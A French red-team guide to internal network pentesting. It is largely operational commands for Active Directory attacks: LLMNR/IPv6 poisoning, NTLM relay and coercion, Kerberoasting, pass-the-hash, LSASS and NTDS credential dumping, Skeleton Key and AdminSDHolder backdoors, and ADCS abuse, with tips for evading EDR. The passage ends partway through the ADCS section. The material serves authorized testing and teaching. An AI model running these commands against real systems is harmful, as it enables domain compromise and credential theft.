NIS2 : Directive UE 2022/2555 Cybersecurite (2026) AI Act 2026 : Reglement UE 2024/1689 sur l'IA — Guide Windows Internals : Structures Noyau et Exploitation ROI d'un Audit Sécurité : Chiffrer la Valeur pour le Comex Choisir son Prestataire Cybersécurité : 10 Critères Exercice de gestion de crise cyber : scénarios et RETEX Politique de sécurité du SI : rédaction et déploiement Tableau de bord cybersécurité : KPIs pour le management Assurance cyber 2026 : critères, exclusions et conseils Gouvernance cybersécurité : rôle du RSSI et du COMEX Gestion des tiers et supply chain : évaluer les risques Budget cybersécurité : justifier vos investissements Plan de continuité d'activité PCA : conception et tests vCISO : Le Directeur Cybersécurité Externalisé pour PME Budget Cybersécurité PME : Guide d'Investissement et ROI

Sécurité Industrielle OT/ICS

14 articles
IA et cybersécurité industrielle OT — nouveaux risques 2026 Pentest SCADA/ICS : Sécurité des Systèmes Industriels Incident response en OT particularités et contraintes ICS Sécurité systèmes de contrôle énergie et utilities OT Air-gap et isolation réseau mythes et réalités en OT Conformité NIS 2 opérateurs importance vitale secteur OT Pentest industriel méthodologie et outils spécifiques OT Sécuriser automates PLC et RTU en production industrielle Threat intelligence pour environnements OT et sources ICS Gestion vulnérabilités en environnement industriel et OT Architecture sécurité OT/IT convergente et segmentation IEC 62443 norme cybersécurité industrielle en pratique Protocoles industriels vulnérables Modbus DNP3 OPC UA Détection intrusion environnement SCADA et systèmes ICS

IAM et Gestion des Identités

15 articles
Keycloak : Sécuriser et Auditer votre IAM Open Source Microsoft Entra ID : Identité Cloud (ex-Azure AD) 2026 Arsenal Open Source : 50 Outils Sécurité Essentiels ITDR : détecter les menaces identitaires en temps réel PAM multi-cloud : gérer les accès privilégiés hybrides Passwordless : stratégie complète pour zéro mot de passe Sécuriser les comptes de service : rotation et vault SAML vs OIDC vs OAuth2 : choisir le bon protocole SSO RBAC, ABAC, PBAC : modèles de contrôle d’accès comparés MFA résistant au phishing : FIDO2, Passkeys et au-delà Identity Governance IGA : automatiser le cycle de vie Just-In-Time Access : élévation de privilèges contrôlée Zero Trust IAM : architecture centrée sur l’identité PAM : guide complet de gestion des accès à privilèges Sécuriser Entra ID : configuration avancée et pratiques

DevSecOps

14 articles
Checklists Sécurité — Audit & Durcissement
Formats disponibles
📄 PDF 📊 Excel 🌐 Web

11 checklists professionnelles couvrant 2 200+ points de contrôle. Téléchargement gratuit, aucune inscription.

Télécharger le PDF
Grand Guide · Lecture en ligne

Guide Red Team Pentest Réseau Interne : Méthodologie 2026

Guide méthodologique pentest réseau interne : reconnaissance, exploitation, mouvement latéral, escalade de privilèges et post-exploitation. Red Team 2026.

110 min de lecture
... mots
100% Gratuit
Chapitre en cours
Guide Red Team Pentest Réseau Interne : Méthodologie 2026
Page 1

Le pentest réseau interne — aussi appelé test d'intrusion interne — constitue en 2026 l'exercice de sécurité offensive le plus révélateur de la posture réelle d'une organisation face aux menaces internes et aux scénarios post-compromission. Contrairement au pentest externe, qui évalue la surface d'attaque exposée sur Internet, le pentest interne simule un attaquant ayant déjà franchi le premier périmètre : un collaborateur malveillant, un poste compromis par phishing, un accès VPN volé, ou encore une intrusion physique dans les locaux. En 2026, les menaces les plus dévastatrices — ransomwares, espionnage étatique des groupes Volt Typhoon, FIN7, Storm-0558 — naissent presque toutes d'un mouvement latéral interne prolongé, invisible aux outils périmètriques. Ce guide expert couvre l'intégralité de la méthodologie Red Team appliquée aux réseaux internes : reconnaissance passive et active, Active Directory, exploitation des services, pivoting, persistance, évasion EDR, ADCS, et reporting. Il s'adresse aux pentesters confirmés, aux équipes Red Team, et aux professionnels souhaitant comprendre en profondeur les techniques employées par les attaquants les plus sophistiqués. Chaque section combine théorie, commandes opérationnelles, et recommandations défensives, pour une lecture à double valeur — offensive et défensive — indispensable dans le contexte réglementaire français 2026 (DORA, NIS2, doctrine ANSSI).

1. Introduction au pentest réseau interne en 2026

Le paysage de la menace interne a profondément évolué entre 2022 et 2026. Les groupes APT adoptent des stratégies de living-off-the-land — utilisation exclusive d'outils légitimes — rendant leur détection quasiment impossible sans télémétrie comportementale avancée. Le pentest interne s'est adapté : il ne s'agit plus seulement de démontrer qu'un attaquant peut accéder à un partage réseau, mais de reproduire fidèlement les tactiques, techniques et procédures (TTP) des acteurs étatiques et cybercriminels.

Différences pentest externe vs interne

CritèrePentest externePentest interne
Point de départInternet, sans credentialLAN, VPN, ou post-phishing
Objectif principalBreach du périmètreEscalade privilèges, DA, exfiltration
Outils dominantsNmap, Burp, MetasploitBloodHound, Impacket, Rubeus, NetExec
Durée typique5-10 jours10-20 jours
Niveau OPSEC requisModéréÉlevé (EDR, MDI, SOC actif)
Protocoles ciblésHTTP, TLS, DNSSMB, LDAP, Kerberos, RPC, WMI
Valeur métierSurface exposéeBlast radius post-compromission
À retenir : En 2026, 94% des ransomwares réussis impliquent une phase de mouvement latéral interne de plus de 48 heures avant chiffrement (source : Mandiant M-Trends 2025). Le pentest interne est le seul moyen de mesurer réellement ce risque.

Évolution méthodologique 2024-2026

Trois ruptures majeures caractérisent l'évolution du pentest interne sur cette période. Premièrement, la généralisation des EDR nouvelle génération (CrowdStrike Falcon, SentinelOne, Microsoft Defender for Endpoint) force les pentesters à maîtriser les techniques d'évasion en mémoire. Deuxièmement, la montée en puissance d'Active Directory Certificate Services (ADCS) comme vecteur d'exploitation, popularisée par les recherches de SpecterOps en 2021 puis massivement exploitée par les APT jusqu'en 2026. Troisièmement, l'hybridation des environnements on-premises / Azure Active Directory crée des chaînes d'attaque inédites traversant les frontières cloud.

Position du pentest interne dans la kill chain

Dans le framework MITRE ATT&CK, le pentest interne couvre essentiellement les phases post-accès initial : Discovery (TA0007), Lateral Movement (TA0008), Credential Access (TA0006), Privilege Escalation (TA0004), Persistence (TA0003), et Exfiltration (TA0010). La phase Initial Access (TA0001) est généralement accordée par le client sous forme d'un poste compromis ou d'un accès VPN avec compte de domaine standard.

2. Cadre méthodologique : PTES, OSSTMM, NIST 800-115

Trois frameworks de référence structurent les missions de pentest interne en 2026. Leur compréhension est indispensable pour cadrer juridiquement et techniquement chaque engagement, communiquer avec le client, et assurer la reproductibilité des résultats.

FrameworkÉditeurPoints fortsLimites
PTESCommunauté (open)Très opérationnel, 7 phases détailléesPas mis à jour depuis 2012
OSSTMMISECOMApproche quantitative (RAV score)Complexe, peu adopté en France
NIST 800-115NISTRéférence gouvernementale, très structuréTrop générique pour AD moderne
TIBER-EUBCE/ENISARed Team financier, intelligence-ledRéservé au secteur financier
CBESTBank of EnglandIntelligence-led, très matureUK uniquement

Phases standardisées PTES appliquées au réseau interne

Le Penetration Testing Execution Standard (PTES) découpe la mission en sept phases : pré-engagement, collecte de renseignements, modélisation des menaces, analyse de vulnérabilités, exploitation, post-exploitation, et rapport. En contexte réseau interne, la phase de modélisation des menaces est cruciale : elle définit les scénarios d'attaque prioritaires selon le profil de l'organisation (secteur financier, industriel, santé) et les groupes APT susceptibles de la cibler.

À retenir : L'ANSSI recommande dans son guide PACS (Prestataires d'Audit de la Sécurité des Systèmes d'Information) de référencer explicitement le framework utilisé dans la lettre de mission et le rapport final. La qualification PASSI impose une traçabilité complète des tests effectués.

3. Préparation et cadrage de la mission

La préparation d'un pentest interne est aussi critique que l'exécution technique. Une mauvaise définition du périmètre ou des Rules of Engagement (RoE) peut conduire à des incidents opérationnels graves — crash de serveurs de production, déclenchement d'alertes SOC non prévues, voire poursuites judiciaires.

Périmètre, RoE et contraintes légales

Le document de Rules of Engagement doit spécifier : les plages IP autorisées, les comptes fournis (ou non), les heures de test, les actions interdites (exploitation de zeroday, déni de service, exfiltration réelle de données), les contacts d'urgence côté client, et la procédure de notification en cas de découverte critique. En France, le cadre légal repose sur les articles 323-1 à 323-7 du Code Pénal (accès frauduleux aux STAD) — seule la lettre de mission signée protège le pentester.

Élément RoEContenu typeRisque si absent
Plages IP192.168.0.0/16, 10.0.0.0/8Test hors périmètre → litige
Comptes fournisuser@domain.local / Password123Phase recon trop longue
Heures autoriséesLun-Ven 8h-20hIncident production week-end
Actions interditesNo DoS, no real exfilCrash / incident métier
Contact urgenceRSSI + N° directEscalade non maîtrisée

Préparation du laptop d'attaque

En 2026, la majorité des pentesters Red Team utilisent une distribution dédiée sur laptop durci. Kali Linux 2025.x reste la référence avec son dépôt de plus de 600 outils maintenus. Parrot OS Security offre une empreinte mémoire plus légère. Les équipes avancées construisent des images custom Debian/Ubuntu avec uniquement les outils nécessaires, réduisant la surface de détection si le laptop est compromis ou saisi. La configuration minimale recommandée en 2026 : 32 Go RAM, SSD NVMe 1 To, WiFi Intel AX210 (compatible injection), chiffrement LUKS2 complet.

# Installation rapide outils essentiels sur Kali 2025
sudo apt update && sudo apt install -y \
  bloodhound neo4j \
  impacket-scripts \
  netexec \
  certipy-ad \
  coercer \
  ligolo-ng \
  mitm6 \
  responder \
  rubeus \
  crackmapexec \
  enum4linux-ng

# Configuration BloodHound
sudo neo4j start
bloodhound &

# Mise à jour Impacket depuis source (toujours plus récent)
pip3 install git+https://github.com/fortra/impacket.git

OPSEC du poste d'attaque

L'Operational Security (OPSEC) du pentester interne est souvent négligée. En 2026, les SOC modernes équipés de Microsoft Defender for Identity (MDI) ou de CrowdStrike Identity Protection détectent les patterns de reconnaissance LDAP, les requêtes Kerberos anormales, et les connexions SMB multiples depuis une même source. Recommandations OPSEC essentielles : utiliser des noms de machines crédibles (LAPTOP-FINANCE-03 plutôt que KALI-ATTACKER), randomiser les user-agents, éviter les scans massifs aux heures de faible activité, et simuler un comportement utilisateur normal entre les actions offensives.

À retenir : Un bon pentester interne pense comme un attaquant APT : la discrétion prime sur la vitesse. Un scan Nmap complet du réseau en 5 minutes sera détecté par n'importe quel IDS. Préférez des scans lents (--max-rate 10) ou ciblés sur des ports spécifiques.

4. Phase 1 — Reconnaissance interne passive

La phase de reconnaissance passive vise à cartographier le réseau sans générer de trafic suspect. En réseau interne, les protocoles de découverte automatique — LLMNR, NBT-NS, mDNS — transmettent en clair des informations précieuses : noms de machines, services actifs, et surtout déclenchent des authentifications NTLM capturables.

Découverte réseau : nmap, masscan, RustScan

# Découverte rapide des hôtes actifs (OPSEC : lent)
nmap -sn 192.168.1.0/24 --max-rate 50 -oG hosts_up.txt

# Scan ports clés Windows/AD (OPSEC équilibré)
nmap -sV -sC -p 22,53,80,88,135,139,389,443,445,464,593,636,3268,3389,5985,9389 \
  --open -iL hosts_up.txt -oA scan_ad_ports

# RustScan pour découverte ultra-rapide (bruyant - attention OPSEC)
rustscan -a 192.168.1.0/24 --ulimit 5000 -- -sV -sC

# masscan pour très grands réseaux (/8 ou /16)
masscan 10.0.0.0/8 -p 445,88,389 --rate=1000 -oG masscan_results.txt

Énumération DNS, broadcast, mDNS

# Transfert de zone DNS (si mal configuré)
dig axfr @192.168.1.10 domain.local

# Enumération DNS passive
dnsrecon -d domain.local -t std
dnsrecon -d domain.local -t brt -D /usr/share/wordlists/dnsmap.txt

# Écoute passive mDNS/LLMNR (avant Responder)
tcpdump -i eth0 -n 'udp port 5355 or udp port 137 or udp port 5353' -w passive_capture.pcap

# Wireshark analysis des protocoles de découverte
tshark -r passive_capture.pcap -Y 'llmnr or nbns or mdns' -T fields \
  -e ip.src -e dns.qry.name
ProtocolePortInformation exposéeRisque
LLMNRUDP 5355Noms machines, authentifications NTLMCritique
NBT-NSUDP 137Noms NetBIOS, groupes de travailÉlevé
mDNSUDP 5353Noms .local, services BonjourMoyen
SSDPUDP 1900Équipements UPnP, imprimantesMoyen
CDP/LLDPL2Topologie réseau, VLAN, équipementsÉlevé

5. Phase 2 — Reconnaissance Active Directory

L'Active Directory est le système nerveux central de 90% des entreprises. Sa compromission équivaut à la compromission totale du système d'information. La phase de reconnaissance AD vise à identifier les chemins d'attaque vers le Domain Admin (DA), les trusts inter-domaines, les délégations Kerberos dangereuses, et les comptes à privilèges mal configurés.

BloodHound et SharpHound : cartographie des chemins d'attaque

BloodHound est l'outil incontournable de reconnaissance AD depuis 2016. Il ingère des données collectées par SharpHound (C#) ou BloodHound.py (Python) et les visualise sous forme de graphe de relations. En 2026, BloodHound CE (Community Edition) offre une interface web moderne et des requêtes Cypher puissantes pour identifier les chemins vers Domain Admin.

# SharpHound depuis un poste Windows compromis
.\SharpHound.exe -c All --zipfilename bloodhound_data.zip --randomfilenames

# Collecte ciblée (moins bruyante)
.\SharpHound.exe -c DCOnly,Group,LocalAdmin --stealth

# BloodHound.py depuis Kali (pas besoin de poste Windows)
bloodhound-python -u 'user' -p 'Password123' -d domain.local \
  -ns 192.168.1.10 -c All --zip
# Requêtes Cypher BloodHound essentielles
# Tous les chemins vers Domain Admin
MATCH p=shortestPath((u:User)-[*1..]->(g:Group {name:"DOMAIN ADMINS@DOMAIN.LOCAL"}))
RETURN p

# Utilisateurs avec droits DCSync
MATCH (u)-[:GetChanges|GetChangesAll]->(d:Domain) RETURN u.name, d.name

# Comptes Kerberoastables avec chemin vers DA
MATCH (u:User {hasspn:true}) RETURN u.name, u.pwdlastset ORDER BY u.pwdlastset

ADRecon et PingCastle

PingCastle génère un rapport de maturité AD avec score de risque — idéal pour communiquer rapidement avec le client sur l'état général. ADRecon produit des rapports Excel détaillés sur les OUs, GPO, délégations, et comptes sensibles. Ces deux outils sont détectés par MDI et certains EDR — leur exécution doit être prévue dans les RoE.

# PingCastle
.\PingCastle.exe --healthcheck --server domain.local --user user --password Password123

# ADRecon
.\ADRecon.ps1 -ADROutputDir C:\Temp\ADRecon -OutputType Excel,CSV
À retenir : BloodHound identifie en quelques minutes des chemins d'attaque que des auditeurs mettraient des jours à trouver manuellement. La requête "Shortest Paths to Domain Admin" est systématiquement la première à exécuter après ingestion des données.

Identification des trusts et OUs sensibles

# Énumération des trusts AD
Get-ADTrust -Filter * | Select Name,TrustType,TrustDirection,SelectiveAuthentication

# OUs avec délégations dangereuses
Get-ADOrganizationalUnit -Filter * | ForEach-Object {
  $acl = Get-ACL "AD:$($_.DistinguishedName)"
  $acl.Access | Where-Object {$_.ActiveDirectoryRights -match "GenericAll|WriteDacl|WriteOwner"}
}

# Comptes avec privilèges délégués (non-DA mais dangereux)
Get-ADGroupMember -Identity "Account Operators" -Recursive
Get-ADGroupMember -Identity "Backup Operators" -Recursive
Get-ADGroupMember -Identity "Server Operators" -Recursive

6. Empoisonnement réseau (LLMNR/NBT-NS/mDNS poisoning)

L'empoisonnement LLMNR/NBT-NS est l'une des attaques les plus efficaces en réseau interne Windows. Lorsqu'un poste cherche à résoudre un nom non trouvé dans le DNS local, il diffuse une requête LLMNR ou NBT-NS en broadcast. Un attaquant répond à cette requête en se faisant passer pour la cible, ce qui déclenche une authentification NTLM automatique — et donc la capture d'un hash NTLMv2 crackable hors-ligne.

Responder : configuration et utilisation avancée

# Lancement Responder en mode analyse (sans poison - OPSEC)
responder -I eth0 -A

# Mode poison complet
responder -I eth0 -rdwv

# Responder avec HTTPS (nécessite un certificat)
responder -I eth0 -rv --lm --disable-ess

# Consultation des hashes capturés
cat /usr/share/responder/logs/SMB-NTLMv2-*.txt

# Cracking hashcat
hashcat -m 5600 ntlmv2_hashes.txt /usr/share/wordlists/rockyou.txt \
  -r /usr/share/hashcat/rules/best64.rule

mitm6 : empoisonnement IPv6

mitm6 exploite le fait que Windows préfère IPv6 à IPv4 pour la résolution DNS. L'outil répond aux requêtes DHCPv6 en se déclarant passerelle IPv6 et serveur DNS, redirigeant tout le trafic DNS vers l'attaquant. Couplé à ntlmrelayx, c'est l'une des attaques les plus dévastatrices en réseau Windows non durci.

# Terminal 1 : mitm6
mitm6 -d domain.local -i eth0

# Terminal 2 : ntlmrelayx en attente de relais
ntlmrelayx.py -6 -t ldaps://dc01.domain.local -wh fakewpad.domain.local \
  --delegate-access --add-computer

# Avec ciblage ADCS pour certificate theft
ntlmrelayx.py -6 -t http://ca.domain.local/certsrv/certfnsh.asp \
  --adcs --template "DomainController"
À retenir : mitm6 + ntlmrelayx vers ADCS (ESC8) est en 2026 l'une des chaînes d'attaque les plus puissantes sans authentification préalable. Elle permet d'obtenir un certificat de machine DC et donc de forger des tickets Kerberos Domain Admin.

Inveigh : alternative PowerShell

# Inveigh depuis un poste Windows compromis
Import-Module .\Inveigh.ps1
Invoke-Inveigh -LLMNR Y -NBNS Y -mDNS Y -Challenge 1122334455667788 -ConsoleOutput Y

# Récupération des captures
Get-InveighLog
Get-InveighNTLMv2

7. NTLM Relay attacks

Le NTLM Relay consiste à intercepter une authentification NTLM et à la relayer vers un service cible sans avoir besoin de cracker le hash. En 2026, c'est l'une des techniques les plus rentables en pentest interne car elle ne nécessite pas de cracker de mot de passe et fonctionne même avec des hashes NTLMv2 forts.

ntlmrelayx : configurations avancées

# Relay vers SMB (requiert SMB signing désactivé)
ntlmrelayx.py -t smb://192.168.1.20 -smb2support --interactive

# Relay vers LDAP pour ajouter un compte admin
ntlmrelayx.py -t ldap://dc01.domain.local --escalate-user compromised_user

# Relay vers LDAPS avec shadow credentials
ntlmrelayx.py -t ldaps://dc01.domain.local --shadow-credentials --shadow-target TARGET$

# Relay multi-cibles depuis fichier
ntlmrelayx.py -tf targets.txt -smb2support -socks

# Relay vers MSSQL pour exécution de commandes
ntlmrelayx.py -t mssql://sqlserver.domain.local --query "SELECT @@version"

Coercition : forcer les authentifications

La coercition désigne les techniques qui forcent un serveur Windows à s'authentifier vers une cible contrôlée par l'attaquant. Les vecteurs les plus efficaces en 2026 :

TechniqueProtocoleCVE/BugPrérequisImpact
PrinterBugMS-RPRNPas de CVEAccès authentifiéAuthentification machine$
PetitPotamMS-EFSRCVE-2021-36942Non authentifié (patché)Authentification DC$
DFSCoerceMS-DFSNMPas de CVEAccès authentifiéAuthentification machine$
ShadowCoerceMS-FSRVPPas de CVEAccès authentifiéAuthentification machine$
Coercer.pyMultipleMultipleAccès authentifiéTests automatisés
# Coercer.py : test automatisé de tous les vecteurs
coercer scan -u user -p Password123 -d domain.local -t dc01.domain.local -l attacker_ip

# PrinterBug manuel
python3 printerbug.py domain.local/user:Password123@dc01.domain.local attacker_ip

# PetitPotam (version post-patch, authentifié)
python3 PetitPotam.py -u user -p Password123 -d domain.local attacker_ip dc01.domain.local
À retenir : La coercition + relay vers ADCS (ESC8) reste la chaîne d'attaque la plus efficace pour compromettre un domaine sans connaissance préalable de mot de passe. Elle est utilisée activement par des groupes comme BlackCat/ALPHV et documentée dans le rapport M-Trends 2025.

8. Kerberoasting et AS-REP Roasting

Le Kerberoasting est une technique d'attaque hors-ligne contre les comptes de service Active Directory ayant un Service Principal Name (SPN) enregistré. Tout utilisateur authentifié du domaine peut demander un ticket de service (TGS) chiffré avec le hash NTLM du compte de service — et ce ticket est crackable hors-ligne sans interaction avec la cible. En 2026, malgré sa popularité depuis 2014, cette attaque reste redoutablement efficace car des milliers d'organisations maintiennent des comptes de service avec des mots de passe faibles et des SPNs enregistrés.

Identification et exploitation

# Enumération des comptes Kerberoastables avec Rubeus
.\Rubeus.exe kerberoast /stats
.\Rubeus.exe kerberoast /outfile:kerberoast_hashes.txt /nowrap

# Kerberoasting ciblé (compte spécifique)
.\Rubeus.exe kerberoast /user:svc_sql /outfile:svc_sql_hash.txt

# Depuis Kali avec GetUserSPNs.py
GetUserSPNs.py domain.local/user:Password123 -dc-ip 192.168.1.10 -request -outputfile spn_hashes.txt

# Kerberoasting RC4 forcé (moins détectable que AES)
.\Rubeus.exe kerberoast /tgtdeleg /rc4opsec /outfile:hashes.txt
# Cracking hashcat avec règles avancées
# Mode 13100 = Kerberos 5 TGS-REP etype 23 (RC4)
hashcat -m 13100 kerberoast_hashes.txt /usr/share/wordlists/rockyou.txt \
  -r /usr/share/hashcat/rules/best64.rule \
  -r /usr/share/hashcat/rules/d3ad0ne.rule \
  --status --status-timer 30

# Mode 19600 = Kerberos 5 TGS-REP etype 17 (AES128)
hashcat -m 19600 kerberoast_hashes.txt wordlist.txt

# Mode 19700 = Kerberos 5 TGS-REP etype 18 (AES256)
hashcat -m 19700 kerberoast_hashes.txt wordlist.txt

AS-REP Roasting

L'AS-REP Roasting cible les comptes pour lesquels la préauthentification Kerberos est désactivée (attribut DONT_REQUIRE_PREAUTH). Le KDC retourne alors un AS-REP chiffré avec le hash du compte sans vérifier l'identité du demandeur — ce AS-REP est crackable hors-ligne.

# GetNPUsers.py pour AS-REP Roasting
GetNPUsers.py domain.local/ -usersfile users.txt -no-pass -dc-ip 192.168.1.10 \
  -outputfile asrep_hashes.txt

# Avec credentials (accès authentifié)
GetNPUsers.py domain.local/user:Password123 -dc-ip 192.168.1.10 \
  -request -outputfile asrep_hashes.txt

# Cracking AS-REP (mode 18200)
hashcat -m 18200 asrep_hashes.txt /usr/share/wordlists/rockyou.txt \
  -r /usr/share/hashcat/rules/best64.rule
CritèreKerberoastingAS-REP Roasting
PrérequisCompte de domaine valideAucun (si comptes connus)
CibleComptes avec SPNComptes sans préauth
Hash typeTGS-REP (RC4/AES)AS-REP (RC4)
Détection MDIOui (anomalie volume)Oui (AS-REP sans preauth)
Contre-mesureMots de passe forts, MSAActiver préauthentification

9. Mouvement latéral classique

Le mouvement latéral désigne l'ensemble des techniques permettant à un attaquant de se propager d'un système à l'autre au sein du réseau cible. En pentest interne, c'est la phase la plus visible et la plus risquée du point de vue détection. Les techniques classiques — Pass-the-Hash, Pass-the-Ticket — restent efficaces en 2026 mais nécessitent une attention particulière à l'OPSEC face aux EDR modernes.

Pass-the-Hash avec NetExec

NetExec (successeur de CrackMapExec, nxc) est l'outil de référence pour le mouvement latéral SMB en 2026. Il supporte l'authentification par hash NTLM, Kerberos, et certificat, et permet d'exécuter des commandes sur de nombreuses machines simultanément.

# Pass-the-Hash SMB basique
nxc smb 192.168.1.0/24 -u Administrator -H aad3b435b51404eeaad3b435b51404ee:8846f7eaee8fb117ad06bdd830b7586c

# Vérification accès admin local
nxc smb targets.txt -u Administrator -H HASH --local-auth

# Exécution de commande (méthode wmiexec - moins détecté)
nxc smb 192.168.1.20 -u Administrator -H HASH -x "whoami /all"

# Dump SAM (hashes locaux)
nxc smb 192.168.1.20 -u Administrator -H HASH --sam

# Dump LSA secrets
nxc smb 192.168.1.20 -u Administrator -H HASH --lsa

# Énumération des sessions actives
nxc smb 192.168.1.0/24 -u user -p Password123 --sessions

Pass-the-Ticket avec Rubeus

# Dump des tickets Kerberos en mémoire
.\Rubeus.exe dump /nowrap

# Import d'un ticket pour PtT
.\Rubeus.exe ptt /ticket:BASE64_TICKET

# Overpass-the-Hash : de NT hash vers ticket Kerberos
.\Rubeus.exe asktgt /user:Administrator /rc4:NTLM_HASH /ptt

# Avec AES256 (plus discret - KDC encryption)
.\Rubeus.exe asktgt /user:Administrator /aes256:AES256_HASH /opsec /ptt

Mouvement latéral via WMI, WinRM, PowerShell distant

# WMI execution (OPSEC : spawn de wmiprvse.exe)
$wmi = [wmiclass]"\\192.168.1.20\root\cimv2:Win32_Process"
$result = $wmi.Create("powershell.exe -enc BASE64COMMAND")

# WinRM / PowerShell Remoting
$session = New-PSSession -ComputerName server01 -Credential $cred
Invoke-Command -Session $session -ScriptBlock { whoami; hostname }

# Evil-WinRM depuis Kali
evil-winrm -i 192.168.1.20 -u Administrator -H NTLM_HASH

# DCOM exec (moins commun, moins détecté)
$com = [activator]::CreateInstance([type]::GetTypeFromProgID("MMC20.Application","192.168.1.20"))
$com.Document.ActiveView.ExecuteShellCommand("cmd.exe",$null,"/c whoami > C:\Temp\out.txt","7")
À retenir : En 2026, WMI et DCOM sont les méthodes d'exécution distante les moins détectées par les EDR modernes. PSExec (spawn de services) et SMBExec sont en revanche fortement surveillés. Favorisez WMI ou WinRM selon le contexte.

Pour approfondir le Pass-the-Hash, consultez notre guide Pass-the-Hash : techniques et défenses.

10. PSExec, SMBExec, WMIExec et alternatives

Les outils d'exécution distante de la suite Impacket sont incontournables mais ont des empreintes très différentes en termes de détection. Comprendre leurs mécanismes internes permet de choisir la technique adaptée au contexte OPSEC.

OutilMécanismePrérequisDétectabilitéCas d'usage
psexec.pyUpload service + executionAdmin + port 445Très élevée (service créé)Labs, sans EDR
smbexec.pyService + cmd redirectionAdmin + port 445Élevée (service temporaire)Sans EDR
wmiexec.pyWMI CreateProcessAdmin + WMIMoyennePentest standard
atexec.pyTask SchedulerAdmin + port 445Moyenne (task créée)Exécution différée
dcomexec.pyDCOM MMC20Admin + DCOMFaibleEnvironnements EDR
# wmiexec.py (recommandé OPSEC)
wmiexec.py domain.local/Administrator:Password123@192.168.1.20
wmiexec.py -hashes :NTLM_HASH domain.local/Administrator@192.168.1.20

# dcomexec.py (faible détection)
dcomexec.py domain.local/Administrator:Password123@192.168.1.20 -object MMC20

# smbexec.py (semi-interactif)
smbexec.py domain.local/Administrator:Password123@192.168.1.20

# Exécution one-shot avec output
wmiexec.py -nooutput domain.local/Administrator:Password123@192.168.1.20 "cmd.exe /c net user hacker P@ssw0rd123 /add && net localgroup administrators hacker /add"

11. Persistance et escalade dans Active Directory

Une fois un accès Domain Admin obtenu, la phase de persistance vise à maintenir cet accès même en cas de rotation des mots de passe ou de réponse à incident. Les techniques de persistance AD sont particulièrement insidieuses car elles exploitent des mécanismes légitimes d'Active Directory.

AdminSDHolder backdoor

L'AdminSDHolder est un conteneur AD dont les ACL sont propagées à intervalles réguliers (60 minutes par défaut) vers tous les comptes protégés (membres de Domain Admins, Enterprise Admins, etc.). En modifiant les ACL d'AdminSDHolder, un attaquant peut persister même si ses droits explicites sont révoqués.

# Ajout d'un backdoor via AdminSDHolder
Add-DomainObjectAcl -TargetIdentity "CN=AdminSDHolder,CN=System,DC=domain,DC=local" `
  -PrincipalIdentity backdoor_user -Rights All -Verbose

# Vérification (attendre propagation SDProp ~60min ou forcer)
Invoke-ADSDPropagation

# Avec PowerView
$acl = Get-ObjectAcl -DistinguishedName "CN=AdminSDHolder,CN=System,DC=domain,DC=local" `
  -ResolveGUIDs | ? {$_.IdentityReference -match "backdoor_user"}

Skeleton Key

La Skeleton Key est un patch en mémoire du processus LSASS du Domain Controller qui ajoute un mot de passe maître universel accepté pour tout compte du domaine. Elle ne persiste pas au redémarrage mais est indétectable par les solutions qui ne surveillent pas l'intégrité de LSASS.

# Skeleton Key via Mimikatz (nécessite DA)
# Exécution sur le DC
Invoke-Mimikatz -Command '"privilege::debug" "misc::skeleton"' -ComputerName dc01

# Après déploiement : accès avec le mot de passe universel "mimikatz"
nxc smb dc01.domain.local -u anyuser -p mimikatz

Pour les techniques de Golden Ticket et Silver Ticket, consultez notre guide Golden Ticket : attaque et défense complète.

À retenir : Les techniques de persistance AD (AdminSDHolder, DSRM, Skeleton Key) sont les plus dangereuses car elles survivent à la rotation des mots de passe. Leur détection nécessite une surveillance spécifique des modifications ACL sur les objets sensibles AD et une surveillance de l'intégrité de LSASS.

12. DCSync et exfiltration de hashes

L'attaque DCSync simule le comportement d'un Domain Controller en demandant une réplication des hashes de mots de passe via le protocole MS-DRSR (Directory Replication Service). Elle ne nécessite pas d'exécution de code sur le DC — uniquement les droits DS-Replication-Get-Changes et DS-Replication-Get-Changes-All.

# DCSync avec Mimikatz
Invoke-Mimikatz -Command '"lsadump::dcsync /domain:domain.local /user:Administrator"'
Invoke-Mimikatz -Command '"lsadump::dcsync /domain:domain.local /all /csv"'

# DCSync ciblé sur le compte krbtgt (pour Golden Ticket)
Invoke-Mimikatz -Command '"lsadump::dcsync /domain:domain.local /user:krbtgt"'
# secretsdump.py depuis Kali (recommandé)
secretsdump.py domain.local/Administrator:Password123@dc01.domain.local
secretsdump.py -hashes :NTLM_HASH domain.local/Administrator@dc01.domain.local

# DCSync uniquement (sans dump local)
secretsdump.py domain.local/Administrator:Password123@dc01.domain.local \
  -just-dc -just-dc-user Administrator

# Extraction NTDS.dit hors-ligne
secretsdump.py -ntds /path/to/ntds.dit -system /path/to/SYSTEM LOCAL

Extraction NTDS.dit hors-ligne

# Volume Shadow Copy pour copier NTDS.dit en live
# Méthode 1 : vssadmin
vssadmin create shadow /for=C:
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\NTDS\ntds.dit C:\Temp\
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SYSTEM C:\Temp\
reg save HKLM\SYSTEM C:\Temp\SYSTEM.bak

# Méthode 2 : ntdsutil (LOLBin)
ntdsutil "ac i ntds" "ifm" "create full C:\Temp\ifm" q q

Pour les techniques DCSync complètes, consultez notre guide DCSync : attaque et contre-mesures.

13. ADCS exploitation (Certipy, Certify)

Les Active Directory Certificate Services (ADCS) sont devenus en 2023-2026 le vecteur d'escalade de privilèges le plus exploité en environnement Windows. Les recherches de Will Schroeder et Lee Christensen (SpecterOps) publiées en 2021 ont mis en lumière 8 configurations dangereuses (ESC1-ESC8), puis la communauté a identifié ESC9-ESC15 jusqu'en 2025.

Découverte des vulnérabilités ADCS

# Certipy find : audit complet ADCS
certipy find -u user@domain.local -p Password123 -dc-ip 192.168.1.10 -stdout
certipy find -u user@domain.local -p Password123 -dc-ip 192.168.1.10 -vulnerable -stdout

# Certify.exe (version Windows)
.\Certify.exe find /vulnerable /domain:domain.local
ESCNomConditionImpactOPSEC
ESC1Template allows SANENROLLEE_SUPPLIES_SUBJECT + enroll pour tousImpersonate tout userMoyen
ESC2Any Purpose EKUEKU = Any ou videAuthentification arbitraireMoyen
ESC3Enrollment AgentCertificate Request Agent EKUDemander certs au nom d'autresÉlevé
ESC4Vulnerable ACL templateWrite sur templateModifier template → ESC1Faible
ESC6EDITF_ATTRIBUTESUBJECTALTNAME2Flag CA activéSAN dans toute demandeMoyen
ESC7CA ACL vulnManageCA ou ManageCertificatesÉmettre certs arbitrairesFaible
ESC8NTLM relay ADCS HTTPWeb Enrollment actif (HTTP)Cert via relayÉlevé
